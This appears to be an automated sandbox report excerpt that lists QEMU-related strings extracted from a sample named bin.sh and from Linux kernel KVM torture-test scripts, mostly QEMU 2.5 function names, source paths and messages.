                            Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_size_del
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_free_irqs
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_sem_timedwait
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/irq.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/mmap.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/envlist.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: Unsupported ARM syscall: 0x%x
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strtosz_suffix
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /usr/lib/x86_64-linux-gnu/qemu
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_free
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_ld_i32
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: arm926_initfnarm946_initfnarm1026_initfnarm1136_r2_initfnarm1136_initfnarm1176_initfnarm11mpcore_initfncortex_m3_initfnarm_v7m_cpu_exec_interruptarm_v7m_class_initcortex_m4_initfncortex_r5_initfncortex_a8_initfncortex_a9_initfncortex_a15_initfnti925t_initfnsa1100_initfnsa1110_initfnpxa250_initfnpxa255_initfnpxa260_initfnpxa261_initfnpxa262_initfnpxa270a0_initfnpxa270a1_initfnpxa270b0_initfnpxa270b1_initfnpxa270c0_initfnpxa270c5_initfnarm_any_initfnarm_cpu_initfnarm_cpu_post_initarm_cpu_finalizefnarm_cpu_realizefncp_reg_check_resetarm_cpu_resetarm_cpu_has_workarm_cpu_set_pcarm_cpu_handle_mmu_faultarm_disas_set_infoarm_cpu_class_initarm_cpu_exec_interrupt/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/gdbstub.carm_cpu_gdb_write_registerarm_cpu_gdb_read_register/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/crypto_helper.cdecrypt < 2helper_crypto_sha1_3reg
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: opt->desc && opt->desc->type == QEMU_OPT_BOOL
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_try_memalign
                            Source: functions.sh0.8.drBinary or memory string: # identify_qemu_append qemu-cmd
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_utimens
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_from_qdict
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_trylock
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: %s: %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_allocate_irqs
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_set_tty_echo
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_log_mask
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/oslib-posix.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_print_log_usage
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/translate-all.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: Unsupported syscall: %d
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_pipe
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_str_to_log_mask
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_size
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: _ZN16QEMUDisassemblerD2Ev
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/crypto_helper.c
                            Source: functions.sh0.8.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_sem_destroy
                            Source: functions.sh0.8.drBinary or memory string: identify_qemu () {
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/i386/tcg-target.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu.sstep
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/gdbstub.c
                            Source: functions.sh0.8.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_init_exec_dir
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strnlen
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-input-visitor.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: err && errp != &error_abort*errp == NULL%s: %sCould not open '%s'errp && *errperror_free_or_aborterror_append_hinterror_setv/build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-error.cfname || cur_loc->kind == LOC_FILE!loc->prevcur_loc == loc && loc->prev%s:%d:loc_set_fileloc_restoreloc_poploc_push_restore'on' or 'off'a numbera sizen < sizeof(buf)%.17gNo description availableSupported options:%-16s %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qint.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_del
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_number_helper
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_unset
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: C/build/qemu-tYeErX/qemu-2.5+dfsg/util/unicode.clen > 1 && len < 7
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: Unsupported SemiHosting SWI 0x%02x
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemufpa
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-visit-core.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_real_host_page_mask
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_ram_munmap
                            Source: functions.sh0.8.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: missing argument for option '%s'
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.cPMSAv7 MPU #regions invalid %u
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.huse_icount%08x-%08x %08x %c%c%c
                            Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC=$2
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_open
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: BlockdevOptionsGenericCOWFormatACPI_DEVICE_OSTqovqapi-event.cobj != NULLBALLOON_CHANGEBLOCK_IMAGE_CORRUPTEDfatalBLOCK_IO_ERRORoperationreasonBLOCK_JOB_CANCELLEDBLOCK_JOB_COMPLETEDBLOCK_JOB_ERRORBLOCK_JOB_READYBLOCK_WRITE_THRESHOLDamount-exceededwrite-thresholdDEVICE_DELETEDDEVICE_TRAY_MOVEDtray-openGUEST_PANICKEDMEM_UNPLUG_ERRORMIGRATIONNIC_RX_FILTER_CHANGEDPOWERDOWNQUORUM_FAILUREsector-numsectors-countQUORUM_REPORT_BADRTC_CHANGESHUTDOWNSPICE_CONNECTEDSPICE_DISCONNECTEDSPICE_INITIALIZEDSPICE_MIGRATE_COMPLETEDSUSPEND_DISKVNC_CONNECTEDVNC_DISCONNECTEDVNC_INITIALIZEDVSERPORT_CHANGEWAKEUPWATCHDOGqapi_event_send_watchdogqapi_event_send_vserport_changeqapi_event_send_vnc_initializedqapi_event_send_vnc_disconnectedqapi_event_send_vnc_connectedqapi_event_send_spice_initializedqapi_event_send_spice_disconnectedqapi_event_send_spice_connectedqapi_event_send_rtc_changeqapi_event_send_quorum_report_badqapi_event_send_quorum_failureqapi_event_send_nic_rx_filter_changedqapi_event_send_migrationqapi_event_send_mem_unplug_errorqapi_event_send_guest_panickedqapi_event_send_device_tray_movedqapi_event_send_device_deletedqapi_event_send_block_write_thresholdqapi_event_send_block_job_readyqapi_event_send_block_job_errorqapi_event_send_block_job_completedqapi_event_send_block_job_cancelledqapi_event_send_block_io_errorqapi_event_send_block_image_corruptedqapi_event_send_balloon_changeqobject_decrefqapi_event_send_acpi_device_ostuint8_tuint16_tuint32_tstringsInvalid parameter '%s'/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-visit-core.cinput_type_enuminput_type_enumoutput_type_enumoutput_type_enumvisit_type_int32visit_type_int16visit_type_int8visit_type_uint32visit_type_uint16visit_type_uint8/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-dealloc-visitor.cobj == NULLqapi_dealloc_end_listqobject_decref/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-input-visitor.cQMP input object member '%s' is unexpectedParameter '%s' is missingintegerqiv->nb_stack > 0An internal buffer overranQDictqmp_input_pushqmp_input_start_structqmp_input_start_listqmp_input_popqmp_input_popqmp_input_type_intqmp_input_type_boolqmp_input_type_strqmp_input_type_numberqobject_typeqmp_input_get_next_typeqobject_decref/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-output-visitor.cqmp_output_next_listqobject_typeqobject_decrefyestruean int64 value or range/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-input-visitor.cparse_type_intparse_type_sizeparse_type_boolparse_type_strparse_type_number%f"%s"<null>sov->list_mode == LM_NONEiBi < ARRAY_SIZE(suffixes)%lu (%0.3g %c%s)0x%lx-0x%lx%ld-%ld/build/qemu-tYeErX/qemu-2.5+dfsg/qapi/string-output-visitor.csov->list_mode == LM_STARTED || sov->list_mode == LM_END || sov->list_mode == LM_NONE || sov->list_mode == LM_IN_PROGRESSsov->range_start.s < sov->range_end.sprint_type_intBKMGTPEprint_type_sizestart_listend_list@
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/thunk.c*type_ptr < max_struct_entriesid < max_struct_entriesInvalid type 0x%x
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: opt->desc && opt->desc->type == QEMU_OPT_NUMBER
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_has_help_opt
                            Source: functions.sh0.8.drBinary or memory string: specify_qemu_cpus () {
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/cpu.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_reset
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_vfree
                            Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_RESERVED_VA
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strtosz_suffix_unit
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_ld_i64
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_SET_ENV=var1=val2,var2=val2 QEMU_UNSET_ENV=LD_PRELOAD,LD_DEBUG
                            Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_%s_%s_%d.core
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/exec.cqemu: fatal: cpu_exec_init/build/qemu-tYeErX/qemu-2.5+dfsg/translate-all.cInternal error: code buffer overflow
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: cpu_write_elf32_qemunote
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/op_helper.c!arm_is_secure(env) && arm_current_el(env) != 3/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/internals.h!excp_is_internal(excp)cur_el >= 1 && cur_el <= 3el >= 1 && el <= 3
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_UNSET_ENV environment variables to set and unset
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: Protecting guest commpageVFS: argc is wrong%Y%m%d-%H%M%Sqemu_%s_%s_%d.coreCOREunable to dump %08x
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_set
                            Source: functions.sh0.8.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_get_cpu
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: tcg_gen_qemu_st_i32
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_validate
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: _ZTI16QEMUDisassembler
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_CPU
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/signal.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/translate.c!arm_dc_feature(s, ARM_FEATURE_V8)%s access to unsupported AArch32 64 bit system register cp:%d opc1: %d crm:%d (%s)
                            Source: kvm.sh.8.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_loglevel
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: @/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/arm-semi.cqemu: Unsupported SemiHosting SWI 0x%02x
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_fdatasync
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_do_parse
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu-arm version 2.5.0 (Debian 1:2.5+dfsg-5ubuntu10.32), Copyright (c) 2003-2008 Fabrice Bellard
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: host_start || host_sizeMultiple PT_INTERP entriesInvalid PT_INTERP entrycannot mmap brkmmap stack/usr/lib/libc.so.1/usr/lib/ld.so.1sp_auxv - sp == sizeunable to get current timestamp: %s/build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/elfload.cReserved 0x%lx bytes of guest address space
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object_interfaces.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/gdbstub.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu-arm version 2.5.0 (Debian 1:2.5+dfsg-5ubuntu10.32), Copyright (c) 2003-2008 Fabrice Bellardusage: qemu-arm [options] program [arguments...]
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_set_block
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: tcg_gen_qemu_ld_i32
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_atexit_add
                            Source: functions.sh0.8.drBinary or memory string: identify_qemu_args () {
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/cpu.h
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_sem_init
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_fork
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_ram_mmap
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qnull.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: unknown option '%s'
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_sem_wait
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_RAND_SEED
                            Source: functions.sh0.8.drBinary or memory string: echo qemu-system-ppc64
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_register_reset
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_cond_init
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: _ZN16QEMUDisassembler13ProcessOutputEPKN4vixl11InstructionE
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: 16QEMUDisassembler
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: fatal:
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strtol
                            Source: functions.sh0.8.drBinary or memory string: identify_qemu_vcpus () {
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_irq_split
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qjson.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/optimize.c/build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/bitops.hstart >= 0 && length > 0 && length <= 64 - startnb_oargs == 1
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_irq_proxy
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_exit
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: aarch64_banked_spsr_indexupdate_spselhelper_msr_i_pstatehelper_access_check_cp_reghelper_access_check_cp_reghelper_exception_internalraise_exceptioncpu_has_workarm_el_is_aa64/build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/helper.cRegister redefined: cp=%d %d bit crn=%d crm=%d opc1=%d opc2=%d, was %s, now %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: _ZTV16QEMUDisassembler
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/main.cextract64(env->exclusive_addr, 32, 32) == 0qemu: unhandled CPU exception 0x%x - aborting
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/helper.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_join
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: protstart < endpage_set_flagsarm_el_is_aa64tb_gen_codecpu_restore_state_from_tbtb_unlocktb_lock/build/qemu-tYeErX/qemu-2.5+dfsg/cpu-exec.c/build/qemu-tYeErX/qemu-2.5+dfsg/include/qom/cpu.h/build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/rcu.hcc->set_pcTrace %p [%08x] %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/disas.cDisassembler disagrees with translator over instruction decoding
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_sem_post
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_event_reset
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_pid=$!
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_anon_ram_alloc
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: opts_accepts_any(opts)!errp || !*errpan identifierDuplicate ID '%s' for %s,id=id=%s%s%s=%s%s=%ld%s%s=%sopts != NULL/build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-option.ca non-negative number below 2^64You may use k, M, G or T suffixes for kilobytes, megabytes, gigabytes and terabytes.opt->desc && opt->desc->type == QEMU_OPT_BOOLopt->desc && opt->desc->type == QEMU_OPT_NUMBERopt->desc && opt->desc->type == QEMU_OPT_SIZEIdentifiers consist of letters, digits, '-', '.', '_', starting with a letter.!permit_abbrev || list->implied_opt_name!defaults || list->merge_listsqemu_opts_foreachqemu_opts_validateqemu_opts_validateqobject_typeqemu_opts_from_qdict_1qemu_opts_from_qdictqemu_opts_set_defaultsopts_parseqemu_opts_createqemu_opt_foreachqemu_opt_set_numberqemu_opt_set_boolopt_setqemu_opt_unsetqemu_opt_get_size_helperparse_option_numberqemu_opt_get_number_helperparse_option_boolqemu_opt_get_bool_helperqemu_opts_print_helpparse_option_size
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_is_self
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_bool
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_find
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/elfload.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_set_irq
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/optimize.c
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                            Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_extend_irqs
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_anon_ram_free
                            Source: functions.sh0.8.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qbool.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_cond_wait
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_size_helper
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/id.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_st_i32
                            Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: _ZN16QEMUDisassemblerD1Ev
                            Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: thunk_convertthunk_register_struct_directthunk_register_struct/build/qemu-tYeErX/qemu-2.5+dfsg/user-exec.ccc->handle_mmu_faulthandle_cpu_signalReserved virtual address too big
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-option.c
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_STRACE
